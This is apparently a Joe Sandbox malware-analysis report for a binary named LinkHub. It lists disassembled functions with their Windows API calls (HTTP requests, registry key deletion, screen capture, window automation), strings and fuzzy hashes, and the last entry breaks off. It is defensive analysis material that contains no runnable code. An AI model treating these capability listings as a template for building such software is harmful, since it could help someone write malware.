Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 06c28fb92e2a54cca0e6ce4cd6ea6bddb076142ce706e7652d35c9955bbdcffc
Instruction ID: e4a09c90c789d2f8b630e02449e0930ff7a5174e71fc2443f6f2e34d20ecfc61
Opcode Fuzzy Hash: 06c28fb92e2a54cca0e6ce4cd6ea6bddb076142ce706e7652d35c9955bbdcffc
Instruction Fuzzy Hash: E2718A74108245AFD721DF18CC48FAABBF9FB9A304F04455DF995972A1CB70EA0ACB15

Function 00C49B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB24B0

DragQueryPoint.SHELL32(?,?), ref: 00C49BA3

Part of subcall function 00C480AE: ClientToScreen.USER32(?,?), ref: 00C480D4
Part of subcall function 00C480AE: GetWindowRect.USER32(?,?), ref: 00C4814A
Part of subcall function 00C480AE: PtInRect.USER32(?,?,?), ref: 00C4815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00C49C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C49C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C49C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C49C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00C49C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00C49CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00C49CD3
DragFinish.SHELL32(?), ref: 00C49CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00C49DCD

Strings

@GUI_DRAGID, xrefs: 00C49D45
@GUI_DROPID, xrefs: 00C49CFA
@GUI_DRAGFILE, xrefs: 00C49D7C

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: d21b192a3c28a0c37568d0e3559760c84ca345b3b921607bc46b55c836fc7ead
Instruction ID: 6897483d9337c1f59ef258e0f92cd8891ca00dabce7c487580b2f31c07cbe1c2
Opcode Fuzzy Hash: d21b192a3c28a0c37568d0e3559760c84ca345b3b921607bc46b55c836fc7ead
Instruction Fuzzy Hash: 12617C71508305AFC701EF50CC85EAFBBE8FF89750F40096DF592922A1DBB09A49CB52

Function 00C2CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C2CEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C2CF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C2CF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C2CF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C2CF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C2CF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C2CF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C2CFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C2D021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C2D035
InternetCloseHandle.WININET(00000000), ref: 00C2D040

Strings

, xrefs: 00C2CFBA

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 1ffb7284c82f04fc865c2bb589a0d4c262e2746fde3de42e6bab68dcda19e73f
Instruction ID: 6835b7d0a2e339367e88ba656738adc25ef94db5746e1d2253c829066b536cbc
Opcode Fuzzy Hash: 1ffb7284c82f04fc865c2bb589a0d4c262e2746fde3de42e6bab68dcda19e73f
Instruction Fuzzy Hash: B451CCB5500608BFEB21AFA1E888BAF7BBCFF19744F00441AF856C2650D734DA45EB60

Function 00C48FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C466D6,?,?), ref: 00C48FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C466D6,?,?,00000000,?), ref: 00C48FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C466D6,?,?,00000000,?), ref: 00C49009
CloseHandle.KERNEL32(00000000,?,?,?,?,00C466D6,?,?,00000000,?), ref: 00C49016
GlobalLock.KERNEL32(00000000), ref: 00C49024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C466D6,?,?,00000000,?), ref: 00C49033
GlobalUnlock.KERNEL32(00000000), ref: 00C4903C
CloseHandle.KERNEL32(00000000,?,?,?,?,00C466D6,?,?,00000000,?), ref: 00C49043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C466D6,?,?,00000000,?), ref: 00C49054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00C50C04,?), ref: 00C4906D
GlobalFree.KERNEL32(00000000), ref: 00C4907D
GetObjectW.GDI32(00000000,00000018,?), ref: 00C4909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00C490CD
DeleteObject.GDI32(00000000), ref: 00C490F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C4910B

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 676d9d93b36fff424061d1e388c5eb4c4d5400b5e116a345741865b9a661c968
Instruction ID: 30d5f9f7159cd609674ba6c1a7a8c209adcdf451585213cd61d8e035b7ef6668
Opcode Fuzzy Hash: 676d9d93b36fff424061d1e388c5eb4c4d5400b5e116a345741865b9a661c968
Instruction Fuzzy Hash: E5410679600219AFDB21AF65DC88FAF7BB8FB8A711F104058F916D7260D7719E41DB20

Function 00C3C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

Part of subcall function 00C3D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3C10E,?,?), ref: 00C3D415
Part of subcall function 00C3D3F8: _wcslen.LIBCMT ref: 00C3D451
Part of subcall function 00C3D3F8: _wcslen.LIBCMT ref: 00C3D4C8
Part of subcall function 00C3D3F8: _wcslen.LIBCMT ref: 00C3D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C3C154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C3C1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 00C3C26A
RegCloseKey.ADVAPI32(?), ref: 00C3C2DE
RegCloseKey.ADVAPI32(?), ref: 00C3C2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C3C352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C3C364
RegDeleteKeyW.ADVAPI32(?,?), ref: 00C3C382
FreeLibrary.KERNEL32(00000000), ref: 00C3C3E3
RegCloseKey.ADVAPI32(00000000), ref: 00C3C3F4

Strings

RegDeleteKeyExW, xrefs: 00C3C35E
advapi32.dll, xrefs: 00C3C34D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 78e4d1e90401f4bd4edfd6d7c2059e29510741e319d97f58e36490fb31e60b96
Instruction ID: 0d2b90fb9e3aa0b5cbe21d690734cdc3ba054f929879aefc6f557a38cd0cdc2a
Opcode Fuzzy Hash: 78e4d1e90401f4bd4edfd6d7c2059e29510741e319d97f58e36490fb31e60b96
Instruction Fuzzy Hash: C8C17B35214201AFD710DF24C4D5FAEBBE1BF85314F14849CE4AA9B2A2CB75ED46CB91

Function 00C32FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C33035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C33045
CreateCompatibleDC.GDI32(?), ref: 00C33051
SelectObject.GDI32(00000000,?), ref: 00C3305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C330CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C33109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C3312D
SelectObject.GDI32(?,?), ref: 00C33135
DeleteObject.GDI32(?), ref: 00C3313E
DeleteDC.GDI32(?), ref: 00C33145
ReleaseDC.USER32(00000000,?), ref: 00C33150

Strings

(, xrefs: 00C330EA

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 4d61143115516406cccd0c135b79a01462bcefcf714caa207e11667f772276c8
Instruction ID: 753d7c119d0db940de4580e46312712add9c577cfce7285fe3601bb1085d891e
Opcode Fuzzy Hash: 4d61143115516406cccd0c135b79a01462bcefcf714caa207e11667f772276c8
Instruction Fuzzy Hash: 2A61F275D10219EFCF14DFA4D884EAEBBB5FF48310F20841AE956A7210D771AA41DF90

Function 00C4A94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB24B0

GetSystemMetrics.USER32(0000000F), ref: 00C4A990
GetSystemMetrics.USER32(00000011), ref: 00C4A9A7
GetSystemMetrics.USER32(00000004), ref: 00C4A9B3
GetSystemMetrics.USER32(0000000F), ref: 00C4A9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00C4AC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C4AC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C4AC54
ShowWindow.USER32(00000003,00000000), ref: 00C4AC73
InvalidateRect.USER32(?,00000000,00000001), ref: 00C4AC95
DefDlgProcW.USER32(?,00000005,?), ref: 00C4ACBB

Strings

@, xrefs: 00C4ABD0

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @
API String ID: 3962739598-2766056989
Opcode ID: 4f4bca6d26b2ca9e4cfb2cd99776216797fcc372dc8d4b7578e75072d326148a
Instruction ID: aa0f7f78ea79b5c42718d7d3a71f20aacc5e5ebd31d85624593e8f2a0a7c3b09
Opcode Fuzzy Hash: 4f4bca6d26b2ca9e4cfb2cd99776216797fcc372dc8d4b7578e75072d326148a
Instruction Fuzzy Hash: 5FB19834600219EFCF14CF69C9C8BAE3BF2FF44701F188069EC59AA295D731AA80CB51

Function 00C152AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00C152E6
GetWindowTextW.USER32(?,?,00000400), ref: 00C15328
_wcslen.LIBCMT ref: 00C15339
CharUpperBuffW.USER32(?,00000000), ref: 00C15345
_wcsstr.LIBVCRUNTIME ref: 00C1537A
GetClassNameW.USER32(00000018,?,00000400), ref: 00C153B2
GetWindowTextW.USER32(?,?,00000400), ref: 00C153EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00C15445
GetClassNameW.USER32(?,?,00000400), ref: 00C15477
GetWindowRect.USER32(?,?), ref: 00C154EF

Strings

ThumbnailClass, xrefs: 00C153BD, 00C15450

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 401739b152fe072255460e8c4f868e6ee5ffa25a74bdf2c650d5b2e36789b476
Instruction ID: c134566478bead6c354e962b307648c9397eb8575e18e5d761dbcccc59e36ede
Opcode Fuzzy Hash: 401739b152fe072255460e8c4f868e6ee5ffa25a74bdf2c650d5b2e36789b476
Instruction Fuzzy Hash: D691E471104A06EFD708DF24C894BE9B7A9FF82304F404519FAAA83190EB71EE95DB91

Function 00C4976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB24B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C497B6
GetFocus.USER32 ref: 00C497C6
GetDlgCtrlID.USER32(00000000), ref: 00C497D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00C49879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C4992B
GetMenuItemCount.USER32(?), ref: 00C49948
GetMenuItemID.USER32(?,00000000), ref: 00C49958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C4998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C499CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C499FD

Strings

0, xrefs: 00C498FB

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: b75e0438892c726084b1d311a71aaba9e96d2c1023eb4a02759ca1b6215b15b6
Instruction ID: 1e4eb37e55290400c2e6ad71f9707ecc1b2ef1ca8c2671b8f0c7de155121e4b7
Opcode Fuzzy Hash: b75e0438892c726084b1d311a71aaba9e96d2c1023eb4a02759ca1b6215b15b6
Instruction Fuzzy Hash: 3081BF719043219FDB10DF29C884BABBBE8FF99354F00095DF99997291DB70DA05CBA2

Function 00C1C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00C829C0,000000FF,00000000,00000030), ref: 00C1C973
SetMenuItemInfoW.USER32(00C829C0,00000004,00000000,00000030), ref: 00C1C9A8
Sleep.KERNEL32(000001F4), ref: 00C1C9BA
GetMenuItemCount.USER32(?), ref: 00C1CA00
GetMenuItemID.USER32(?,00000000), ref: 00C1CA1D
GetMenuItemID.USER32(?,-00000001), ref: 00C1CA49
GetMenuItemID.USER32(?,?), ref: 00C1CA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C1CAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C1CAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C1CB0C

Strings

0, xrefs: 00C1C904

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 82d8ab89c67a214623c0c50084441a22eeb639fae0326dcafd35d4d436d37ac7
Instruction ID: 3c3d66dbaa91391be1093a9595ad91196aae7397dea23660c187371c0cfdfe7f
Opcode Fuzzy Hash: 82d8ab89c67a214623c0c50084441a22eeb639fae0326dcafd35d4d436d37ac7
Instruction Fuzzy Hash: FB618CB0A40249ABDF11DF64D8C9BEE7BB8FF06344F044055F922A3251DB34AE91EB61

Function 00C1E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C1E4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C1E4FA
_wcslen.LIBCMT ref: 00C1E504
_wcsstr.LIBVCRUNTIME ref: 00C1E554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C1E570

Strings

04090000, xrefs: 00C1E5A6
\VarFileInfo\Translation, xrefs: 00C1E568
StringFileInfo\, xrefs: 00C1E543
DefaultLangCodepage, xrefs: 00C1E5D3
%u.%u.%u.%u, xrefs: 00C1E64E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: e7db191c7164cea210c572f985e4acfcaed04c60aa8d3d20a3c757a0daad8a1b
Instruction ID: 50393e78864be39a452ab2174d476da2aa482b64fc64ae44e0c2779a57622e41
Opcode Fuzzy Hash: e7db191c7164cea210c572f985e4acfcaed04c60aa8d3d20a3c757a0daad8a1b
Instruction Fuzzy Hash: 3341F6726002187BDB04BB649C47FFFB7ACEF56710F1000A6F905E6282FB75DA41A2A5

Function 00C3D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C3D6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C3D6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C3D7A8

Part of subcall function 00C3D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C3D70A
Part of subcall function 00C3D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C3D71D
Part of subcall function 00C3D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C3D72F
Part of subcall function 00C3D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C3D765
Part of subcall function 00C3D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C3D788

RegDeleteKeyW.ADVAPI32(?,?), ref: 00C3D753

Strings

RegDeleteKeyExW, xrefs: 00C3D729
advapi32.dll, xrefs: 00C3D718

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 2d7916ae84f9d9e153db70eb1757fb5c1e7ced62f48f476dd12367d0d17041bc
Instruction ID: 26446a2b0dbd20ea9136887388ffd66a6bc1d2a91168085bf2ec39f9b6b22f91
Opcode Fuzzy Hash: 2d7916ae84f9d9e153db70eb1757fb5c1e7ced62f48f476dd12367d0d17041bc
Instruction Fuzzy Hash: 83316075A11129BBDB21AB91EC88FFFBB7CEF47710F000165B917E3244DA349E459AA0

Function 00C1EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C1EFCB

Part of subcall function 00BCF215: timeGetTime.WINMM(?,?,00C1EFEB), ref: 00BCF219

Sleep.KERNEL32(0000000A), ref: 00C1EFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00C1F01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C1F03E
SetActiveWindow.USER32 ref: 00C1F05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C1F06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00C1F08A
Sleep.KERNEL32(000000FA), ref: 00C1F095
IsWindow.USER32 ref: 00C1F0A1
EndDialog.USER32(00000000), ref: 00C1F0B2

Strings

BUTTON, xrefs: 00C1F030

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 20d1c63a3396e82659356775496ba41fcaef0336072b2bcb498f495c2411f366
Instruction ID: 1799c2a562beb8456fa9e4abe78bcfab18746a8238b05724b78d7a24edd8fab4
Opcode Fuzzy Hash: 20d1c63a3396e82659356775496ba41fcaef0336072b2bcb498f495c2411f366
Instruction Fuzzy Hash: 6E21C379600244BFE711BF64EC89BAF7B69F74BB45F001038F90682272DB719E82A715

Function 00C1F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

